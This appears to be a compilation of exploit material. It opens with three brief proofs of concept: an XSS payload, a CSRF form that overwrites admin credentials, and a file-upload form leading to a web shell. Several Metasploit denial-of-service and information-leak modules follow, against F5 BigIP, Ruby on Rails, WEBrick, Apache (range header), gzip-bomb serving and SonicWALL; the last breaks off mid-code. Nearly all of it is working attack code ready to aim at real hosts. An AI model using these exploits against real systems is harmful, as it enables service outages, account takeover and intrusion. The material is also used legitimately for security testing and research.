<pre><code>=============================================================================================================================================<br />| # Title : penglead v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] use payload : /login.php/"onmouseover%3d'prompt(920974)'bad%3d"<br /><br />[+] https://www/127.0.0.1/demo/brokerbaba.buzz/login.php/"onmouseover%3d'prompt(920974)'bad%3d"<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : ppdb v2.4-update 6118-1 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to the line 10. Set the target website link, save changes and apply.<br /><br />[+] infected file : /root/psb-user-update.php.<br /><br />[+] save code as poc.html<br /><br />[+] payload : <br /><br /><div class="col-lg-6"><br /> <h2 class="page-header">Administrator</h2><br /> <div class="panel panel-default"><br /> <div class="panel-heading"><br /> User Profile <br /> </div><br /> <!-- /.panel-heading --><br /> <div class="panel-body"><br /> <div class="table-responsive"><br /> <form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data"><br /> <table class="table table-striped table-bordered table-hover"><br /> <br /> <tbody><br /> <br /><br /> <tr> <br /> <td>Username</td><br /> <td><input class="form-control" type="text" name="username" value="indoushka" required=""><br /> <input class="form-control" type="hidden" name="id" value="1"></td><br /> </tr><br /><br /> <tr><br /> <td>Password</td><br /> <td><input class="form-control" type="password" name="password" id="password" required=""></td><br /> </tr><br /> <tr><br /> <td>Nama</td><br /> <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" 
required=""></td><br /> </tr><br /><br /> <tr><br /> <td>Email</td><br /> <td><input class="form-control" type="text" name="email" value="indoushka4ever@gmail.com" required=""><br /> <input type="hidden" name="level" id="level" value="1"><br /> </td><br /> </tr><br /> <tr><br /><td colspan="3"><input type="file" name="foto" id="foto" required=""></td><br /></tr><br /> <br /> </tbody><br /> </table><br /> <button type="submit" class="btn btn-primary" name="update" id="update">Update</button><br /> </form><br /> </div><br /> <!-- /.table-responsive --><br /> </div><br /> <!-- /.panel-body --><br /> </div><br /> <!-- /.panel --><br /> </div><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Travel Agency System v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/online-travel-agency-system-using-php.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code uploads an executable malicious file remotely.<br /><br />[+] Go to the line 8.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] infected file : http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php.<br /><br />[+] save code as poc.html.<br /><br /><!DOCTYPE html><br /><html><br /><head><br /> <title>Employee Form</title><br /></head><br /><body><br /> <h2>Employee Form</h2><br /> <form action="http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php" method="post" enctype="multipart/form-data"><br /> <label for="userfile">Profile Picture:</label><br /> <input type="file" id="userfile" name="userfile" required><br><br><br /><br /> <input type="submit" name="employeeform" value="Submit"><br /> </form><br /></body><br /></html><br /><br /><br />[+] http://127.0.0.1/php-travel-agency-system-master/admin/user/shell.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> # Module metadata and options: RLIMIT bounds the number of requests sent, FORCE skips the<br /> # Server-header check performed at the start of run.<br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'F5 BigIP Access Policy Manager Session Exhaustion Denial of Service',<br /> 'Description' => %q{<br /> This module exploits a resource exhaustion denial of service in F5 BigIP devices. An<br /> unauthenticated attacker can establish multiple connections with BigIP Access Policy<br /> Manager (APM) and exhaust all available sessions defined in customer license. In the<br /> first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP<br /> system creates a session, marks it as pending and then redirects the client to an access<br /> policy URI. Since BigIP allocates a new session after the first unauthenticated request,<br /> and deletes the session only if an access policy timeout expires, the attacker can exhaust<br /> all available sessions by repeatedly sending the initial HTTP request and leaving the<br /> sessions as pending.<br /> },<br /> 'Author' =><br /> [<br /> 'Denis Kolegov <dnkolegov[at]gmail.com>',<br /> 'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',<br /> 'Nikita Oleksov <neoleksov[at]gmail.com>'<br /> ],<br /> 'References' =><br /> [<br /> ['URL', 'https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' =><br /> {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> }<br /> ))<br /><br /> register_options(<br /> [<br /> OptInt.new('RLIMIT', [true, 'The number of requests to send', 10000]),<br /> OptBool.new('FORCE', [true, 'Proceed with attack even if a BigIP virtual server isn\'t detected', false])<br /> ])<br /> end<br /><br /> # Sends up to RLIMIT unauthenticated GET / requests and watches each Location header for the<br /> # "maximum concurrent user sessions" redirect (/my.logout.php3?errorcode=14) that marks exhaustion.<br /> # The ECONNRESET rescue at the bottom reads a reset as the appliance's 'Max In Progress Sessions<br /> # Per Client IP' counter firing, i.e. the per-client limit that caps this behaviour.<br /> def run<br /> limit = 
datastore['RLIMIT']<br /> force_attack = datastore['FORCE']<br /><br /> res = send_request_cgi('method' => 'GET', 'uri' => '/')<br /><br /> unless res<br /> print_error("No answer from the BigIP server")<br /> return<br /> end<br /><br /> # Simple test based on HTTP Server header to detect BigIP virtual server<br /> server = res.headers['Server']<br /> unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack<br /> print_error("BigIP virtual server was not detected. Please check options")<br /> return<br /> end<br /><br /> print_status("Starting DoS attack")<br /><br /> # Start attack<br /> limit.times do |step|<br /> if step % 100 == 0<br /> # Integer division: this prints 0% until step reaches limit/100.<br /> print_status("#{step * 100 / limit}% accomplished...")<br /> end<br /> res = send_request_cgi('method' => 'GET', 'uri' => '/')<br /> if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/<br /> print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.")<br /> return<br /> end<br /> end<br /><br /> # Check if attack has failed<br /> # NOTE(review): `uri` is not defined anywhere in this module (every earlier request uses '/');<br /> # unless the HttpClient mixin supplies it, this line raises NameError — verify.<br /> res = send_request_cgi('method' => 'GET', 'uri' => uri)<br /> # NOTE(review): res is not nil-checked here, unlike the two requests above.<br /> if res.headers['Location'] =~ /\/my.policy/<br /> print_error("DoS attack failed. Try to increase the RLIMIT")<br /> else<br /> print_status("Result is undefined. Try to manually determine DoS attack result")<br /> end<br /><br /> rescue ::Errno::ECONNRESET<br /> print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")<br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to BigIP")<br /> rescue ::Rex::ConnectionTimeout<br /> print_error("Unable to connect to BigIP. Please check options")<br /> rescue ::OpenSSL::SSL::SSLError<br /> print_error("SSL/TLS connection error")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',<br /> 'Description' => %q{<br /> When Ruby attempts to convert a string representation of a large floating point<br /> decimal number to its floating point equivalent, a heap-based buffer overflow<br /> can be triggered. This module has been tested successfully on a Ruby on Rails application<br /> using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application<br /> crashes with a segfault error. Other versions of Ruby are reported to be affected.<br /> },<br /> 'Author' =><br /> [<br /> 'Charlie Somerville', # original discoverer<br /> 'joev', # bash PoC<br /> 'todb', # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'CVE', '2013-4164' ],<br /> [ 'OSVDB', '100113' ],<br /> [ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ]<br /> ],<br /> 'DisclosureDate' => '2013-11-22'))<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),<br /> OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])<br /> ])<br /> end<br /><br /> # Request path derived from TARGETURI.<br /> def uri<br /> normalize_uri(target_uri.path.to_s)<br /> end<br /><br /> # HTTP method from HTTPVERB, defaulting to POST.<br /> def verb<br /> datastore['HTTPVERB'] || 'POST'<br /> end<br /><br /> # Random 1-4 digit pattern, memoized so every helper below sees the same value.<br /> def digit_pattern<br /> @digit_pattern ||= rand(10_000).to_s<br /> end<br /><br /> def integer_part<br /> digit_pattern<br /> end<br /><br /> # Repetitions needed for the fractional part to be roughly 500,000 digits long.<br /> def multiplier<br /> (500_000 * (1.0/digit_pattern.size)).to_i<br /> end<br /><br /> # The digit pattern repeated multiplier times.<br /> def fractional_part<br /> digit_pattern * multiplier<br 
/> end<br /><br /> # The evil_float seems to require some repeating element. Maybe<br /> # it's just superstition, but straight up 300_002-length random<br /> # numbers don't appear to trigger the vulnerability. Also, these are<br /> # easier to produce, and slightly better than the static "1.1111..."<br /> # for 300,000 decimal places.<br /> def evil_float_string<br /> [integer_part,fractional_part].join('.')<br /> end<br /><br /> # Sends a single JSON array holding the oversized float, then probes the target again with a<br /> # short random JSON string; a missing/empty reply, or a reset, is reported as a successful DoS.<br /> def run<br /> print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places"<br /> sploit = '['<br /> sploit << evil_float_string<br /> sploit << ']'<br /> print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}"<br /> target_available = true<br /><br /> # NOTE(review): the reply to this request is stored in res but never inspected.<br /> begin<br /> res = send_request_cgi(<br /> {<br /> 'method' => verb,<br /> 'uri' => uri,<br /> 'ctype' => "application/json",<br /> 'data' => sploit<br /> })<br /> rescue ::Rex::ConnectionRefused<br /> print_error "Unable to connect. (Connection refused)"<br /> target_available = false<br /> rescue ::Rex::HostUnreachable<br /> print_error "Unable to connect. (Host unreachable)"<br /> target_available = false<br /> rescue ::Rex::ConnectionTimeout<br /> print_error "Unable to connect. 
(Timeout)"<br /> target_available = false<br /> end<br /><br /> return unless target_available<br /><br /> # Availability probe: any non-empty body means the application is still serving requests.<br /> print_status "Checking availability"<br /> begin<br /> res = send_request_cgi({<br /> 'method' => verb,<br /> 'uri' => uri,<br /> 'ctype' => "application/json",<br /> 'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json<br /> })<br /> if res and res.body and res.body.size > 0<br /> target_available = true<br /> else<br /> print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)"<br /> target_available = false<br /> end<br /> rescue ::Rex::ConnectionError, Errno::ECONNRESET<br /> print_good "DoS appears successful (Host unreachable)"<br /> target_available = false<br /> end<br /><br /> return unless target_available<br /><br /> print_error "Target is still responsive, DoS was unsuccessful."<br /><br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',<br /> 'Description' => %q{<br /> The WEBrick::HTTP::DefaultFileHandler in WEBrick in<br /> Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7<br /> to 1.8.7-p71, and 1.9 to r18423 allows for a DoS<br /> (CPU consumption) via a crafted HTTP request.<br /> },<br /> 'Author' => 'kris katterjohn',<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'BID', '30644'],<br /> [ 'CVE', '2008-3656'],<br /> [ 'OSVDB', '47471' ],<br /> [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']<br /> ],<br /> 'DisclosureDate' => '2008-08-08'))<br /><br /> register_options([<br /> OptString.new('URI', [ true, 'URI to request', '/' ])<br /> ])<br /> end<br /><br /> # Sends one request whose If-None-Match header is foo="" followed by 100 copies of<br /> # bar="baz" ; the response is never read, so the module only reports that the request went out.<br /> def run<br /> begin<br /> o = {<br /> 'uri' => normalize_uri(datastore['URI']),<br /> 'headers' => {<br /> 'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100<br /> }<br /> }<br /><br /> # NOTE(review): c is never explicitly disconnected — presumably left to framework cleanup; verify.<br /> c = connect(o)<br /> c.send_request(c.request_raw(o))<br /><br /> print_status("Request sent to #{rhost}:#{rport}")<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_status("Couldn't connect to #{rhost}:#{rport}")<br /> # NOTE(review): timeouts and broken pipes are swallowed without any status output.<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Scanner<br /> include Msf::Auxiliary::Report<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Apache Range Header DoS (Apache Killer)',<br /> 'Description' => %q{<br /> The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x<br /> through 2.2.19 allows remote attackers to cause a denial of service (memory and<br /> CPU consumption) via a Range header that expresses multiple overlapping ranges,<br /> exploit called "Apache Killer"<br /> },<br /> 'Author' =><br /> [<br /> 'Kingcope', #original discoverer<br /> 'Masashi Fujiwara', #metasploit module<br /> 'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Actions' =><br /> [<br /> ['DOS', 'Description' => 'Trigger Denial of Service against target'],<br /> ['CHECK', 'Description' => 'Check if target is vulnerable']<br /> ],<br /> 'DefaultAction' => 'DOS',<br /> 'References' =><br /> [<br /> [ 'BID', '49303'],<br /> [ 'CVE', '2011-3192'],<br /> [ 'EDB', '17696'],<br /> [ 'OSVDB', '74721' ],<br /> ],<br /> 'DisclosureDate' => '2011-08-19'<br /> ))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('URI', [ true, "The request URI", '/']),<br /> OptInt.new('RLIMIT', [ true, "Number of requests to send",50])<br /> ])<br /> end<br /><br /> # Scanner entry point: dispatches on the selected action. The ip argument is unused; both<br /> # helpers read datastore['RHOST'] instead — presumably set per host by the Scanner mixin; verify.<br /> def run_host(ip)<br /><br /> case action.name<br /> when 'DOS'<br /> conduct_dos()<br /><br /> when 'CHECK'<br /> check_for_dos()<br /> end<br /><br /> end<br /><br /> # Non-destructive check: one HEAD with a short overlapping Range; a 206 Partial Content reply<br /> # marks the server as vulnerable and records an 'apache.killer' note for the host.<br /> def check_for_dos()<br /> uri = datastore['URI']<br /> rhost = datastore['RHOST']<br /> begin<br /> res = send_request_cgi({<br /> 'uri' => uri,<br /> 
'method' => 'HEAD',<br /> 'headers' => {<br /> "HOST" => rhost,<br /> "Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10",<br /> "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"<br /> }<br /> })<br /><br /> if (res and res.code == 206)<br /> print_status("Response was #{res.code}")<br /> print_status("Found Byte-Range Header DOS at #{uri}")<br /><br /> report_note(<br /> :host => rhost,<br /> :port => rport,<br /> :type => 'apache.killer',<br /> :data => "Apache Byte-Range DOS at #{uri}"<br /> )<br /><br /> else<br /> print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")<br /> end<br /><br /> # NOTE(review): connection failures and timeouts are silently ignored; the host is neither<br /> # reported as unreachable nor marked as checked.<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br /><br /><br /> # Builds a Range header of 1300 overlapping ranges (5-0 .. 5-1299, after an initial 0-) and<br /> # sends it RLIMIT times with a 1-second response timeout; a connection reset is reported as success.<br /> def conduct_dos()<br /> uri = datastore['URI']<br /> rhost = datastore['RHOST']<br /> ranges = ''<br /> for i in (0..1299) do<br /> ranges += ",5-" + i.to_s<br /> end<br /> for x in 1..datastore['RLIMIT']<br /> begin<br /> print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")<br /> res = send_request_cgi({<br /> 'uri' => uri,<br /> 'method' => 'HEAD',<br /> 'headers' => {<br /> "HOST" => rhost,<br /> "Range" => "bytes=0-#{ranges}",<br /> "Request-Range" => "bytes=0-#{ranges}"}},1)<br /><br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to #{rhost}:#{rport}")<br /> rescue ::Errno::ECONNRESET<br /> print_good("DoS packet successful. #{rhost} not responding.")<br /> rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_error("Couldn't connect to #{rhost}:#{rport}")<br /> # NOTE(review): a per-request timeout or broken pipe is ignored here without output.<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Ruby on Rails Action View MIME Memory Exhaustion',<br /> 'Description' => %q{<br /> This module exploits a Denial of Service (DoS) condition in Action View that requires<br /> a controller action. By sending a specially crafted content-type header to a Rails<br /> application, it is possible for it to store the invalid MIME type, and may eventually<br /> consume all memory if enough invalid MIMEs are given.<br /><br /> Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.<br /> },<br /> 'Author' =><br /> [<br /> 'Toby Hsieh', # Reported the issue<br /> 'joev', # Metasploit<br /> 'sinn3r' # Metasploit<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'CVE', '2013-6414' ],<br /> [ 'OSVDB', '100525' ],<br /> [ 'BID', '64074' ],<br /> [ 'URL', 'https://seclists.org/oss-sec/2013/q4/400' ],<br /> [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]<br /> ],<br /> 'DisclosureDate' => '2013-12-04'))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']),<br /> OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),<br /> OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]),<br /> OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])<br /> ],<br /> self.class)<br /> end<br /><br /> # Host header value: RHOST, with ":RPORT" appended when the port is not 80.<br /> def host<br /> host = datastore['RHOST']<br /> host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80<br /> host<br /> end<br /><br /> # Random alphanumeric string of MAXSTRINGSIZE characters, sent as the bogus MIME type.<br /> def long_string<br /> 
Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])<br /> end<br /><br /> #<br /> # Returns a modified version of the URI that:<br /> # 1. Always has a starting slash<br /> # 2. Removes all the double slashes<br /> #<br /> def normalize_uri(*strs)<br /> new_str = strs * "/"<br /><br /> # gsub! returns nil when nothing was replaced, but the loop condition guarantees a match.<br /> new_str = new_str.gsub!("//", "/") while new_str.index("//")<br /><br /> # Makes sure there's a starting slash<br /> unless new_str.start_with?("/")<br /> new_str = '/' + new_str<br /> end<br /><br /> new_str<br /> end<br /><br /> # Raw HTTP/1.1 GET whose Accept header carries the oversized random value; per the description<br /> # the application stores each unseen MIME type, which is what drives memory growth.<br /> # NOTE(review): the description talks about the Content-Type header, but the request sets Accept.<br /> def http_request<br /> uri = normalize_uri(datastore['URIPATH'])<br /><br /> http = ''<br /> http << "GET #{uri} HTTP/1.1\r\n"<br /> http << "Host: #{host}\r\n"<br /> http << "Accept: #{long_string}\r\n"<br /> http << "\r\n"<br /><br /> http<br /> end<br /><br /> # Opens RLIMIT connections and pipelines REQCOUNT requests on each. A reset, broken pipe or<br /> # timeout is reported as success; that signal is a heuristic, since an intermediary dropping<br /> # the connection raises the same exceptions.<br /> def run<br /> begin<br /> print_status("Stressing the target memory, this will take quite some time...")<br /> datastore['RLIMIT'].times { |i|<br /> connect<br /> datastore['REQCOUNT'].times { sock.put(http_request) }<br /> disconnect<br /> }<br /><br /> print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_status("Unable to connect to #{host}.")<br /> rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error<br /> print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")<br /> ensure<br /> disconnect<br /> end<br /> end<br />end<br /><br />=begin<br /><br />Reproduce:<br /><br />1. Add a def index; end to ApplicationController<br />2. Add an empty index.html.erb file to app/views/application/index.html.erb<br />3. Uncomment the last line in routes.rb<br />4. Hit /application<br /><br />=end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'zlib'<br />require 'stringio'<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Gzip Memory Bomb Denial Of Service',<br /> 'Description' => %q{<br /> This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.<br /> Many applications will not implement a length limit check and will eat up all memory and<br /> eventually die. This can also be used to kill systems that download/parse content from<br /> a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).<br /><br /> A FILEPATH datastore option can also be provided to save the .gz bomb locally.<br /><br /> Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly<br /> deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)<br /> will generate a 300 byte gzipped file that expands to 10GB.<br /> },<br /> 'Author' =><br /> [<br /> 'info[at]aerasec.de', # 2004 gzip bomb advisory<br /> 'joev' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'URL', 'http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html' ]<br /> ],<br /> 'DisclosureDate' => '2004-01-01',<br /> 'Actions' =><br /> [<br /> [ 'WebServer', 'Description' => 'Host file via web server' ]<br /> ],<br /> 'PassiveActions' =><br /> [<br /> 'WebServer'<br /> ],<br /> 'DefaultAction' => 'WebServer'))<br /><br /> # NOTE(review): the description mentions a FILEPATH option for saving the bomb locally, but no<br /> # such option is registered here.<br /> register_options(<br /> [<br /> OptInt.new('SIZE', [true, 'Size of uncompressed data in megabytes (10GB default).', 10240]),<br /> OptInt.new('ROUNDS', [true, 'Rounds of gzip compression. 
Some applications (FF) support > 1.', 1]),<br /> OptString.new('URIPATH', [false, 'Path of URI on server to the gzip bomb (default is random)']),<br /> OptString.new('CONTENT_TYPE', [false, 'Content-Type header to serve in the response', 'text/html'])<br /> ],<br /> self.class)<br /> end<br /><br /> # Builds the compressed payload once, then starts the HTTP server; on_request_uri serves it.<br /> def run<br /> datastore['HTTP::compression'] = false # not a good idea<br /> @gzip = generate_gzip<br /> print_status "Gzip generated. Uncompressed=#{default_size}bytes. Compressed=#{@gzip.length}bytes."<br /> exploit # start http server<br /> end<br /><br /> # Serves @gzip with a Content-Encoding that lists "gzip" ROUNDS times, so a client that unwraps<br /> # every layer expands the body to SIZE megabytes. The defense the description alludes to is a<br /> # bound on decompressed output size.<br /> def on_request_uri(cli, request)<br /> print_status "Sending gzipped payload to client #{cli.peerhost}"<br /> rounds = (['gzip']*datastore['ROUNDS']).join(', ')<br /> send_response(cli, @gzip, { 'Content-Encoding' => rounds, 'Content-Type' => datastore['CONTENT_TYPE'] })<br /> end<br /><br /> # zlib ftw<br /> # Recursive: each call wraps the previous round's bytes (blocks) in one more gzip layer and<br /> # returns the accumulated bytes once reps reaches 0. Called with ROUNDS=0 this returns nil.<br /> def generate_gzip(size=default_size, blocks=nil, reps=nil)<br /> reps ||= datastore['ROUNDS']<br /> return blocks if reps < 1<br /><br /> print_status "Generating gzip bomb..."<br /> StringIO.open do |io|<br /> stream = Zlib::GzipWriter.new(io, Zlib::BEST_COMPRESSION, Zlib::DEFAULT_STRATEGY)<br /> buf = nil<br /> begin<br /> # add MB of data to the stream. this takes a little while, but doesn't kill memory.<br /> if blocks.nil?<br /> chunklen = 1024*1024*8 # 8mb per chunk<br /> a = "A"*chunklen<br /> # Integer division: a SIZE under 8 MB gives n = 0 (empty stream); any remainder is dropped.<br /> n = size / chunklen<br /><br /> n.times do |i|<br /> stream << a<br /> if i % 100 == 0<br /> print_status "#{i.to_s.rjust(Math.log(n,10).ceil)}/#{n} chunks added (#{'%.1f' % (i.to_f/n.to_f*100)}%)"<br /> end<br /> end<br /> else<br /> stream << blocks<br /> end<br /><br /> a = nil # gc a<br /> # NOTE(review): io.string is handed to the next round before the outer stream is closed in<br /> # ensure; confirm that the outer gzip trailer is still captured when ROUNDS > 1.<br /> buf = generate_gzip(size, io.string, reps-1)<br /> ensure<br /> stream.flush<br /> stream.close<br /> end<br /> buf<br /> end<br /> end<br /><br /> # SIZE converted from megabytes to bytes.<br /> def default_size<br /> datastore['SIZE']*1024*1024 # mb -> bytes<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok.<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'SonicWALL SSL-VPN Format String Vulnerability',<br /> 'Description' => %q{<br /> There is a format string vulnerability within the SonicWALL<br /> SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory<br /> can be read or written to, depending on the format string used.<br /> There appears to be a length limit of 127 characters of format<br /> string data. With physical access to the device and debugging,<br /> this module may be able to be used to execute arbitrary code remotely.<br /> },<br /> 'Author' => [ 'aushack' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'BID', '35145' ],<br /> #[ 'CVE', '' ], # no CVE?<br /> [ 'OSVDB', '54881' ],<br /> [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],<br /> ],<br /> 'DisclosureDate' => '2009-05-29'))<br /><br /> register_options([<br /> OptString.new('URI', [ true, 'URI to request', '/cgi-bin/welcome/VirtualOffice?err=' ]),<br /> OptString.new('FORMAT', [ true, 'Format string (i.e. 
%x, %s, %n, %p etc)', '%x%x%x%x%x%x%x' ]),<br /> Opt::RPORT(443),<br /> OptBool.new('SSL', [true, 'Use SSL', true]),<br /> ])<br /> end<br /><br /> # Appends FORMAT plus the "XX" marker to the URI's err= parameter and, on a 200 reply, prints<br /> # whatever the login error cell echoed back before the marker.<br /> def run<br /> # 125 plus the 2-byte marker below equals the 127-character limit noted in the description.<br /> if (datastore['FORMAT'].length > 125) # Max length is 127 bytes<br /> print_error("FORMAT string length cannot exceed 125 bytes.")<br /> return<br /> end<br /><br /> fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp<br /> begin<br /> res = send_request_raw({<br /> 'uri' => normalize_uri(datastore['URI']) + fmt,<br /> })<br /><br /> if res and res.code == 200<br /> # NOTE(review): scan's return value is discarded; $1 holds the capture of the last match, or<br /> # nil (so an empty value is printed) when the pattern did not match at all.<br /> res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)<br /> print_status("Information leaked: #{$1}")<br /> end<br /><br 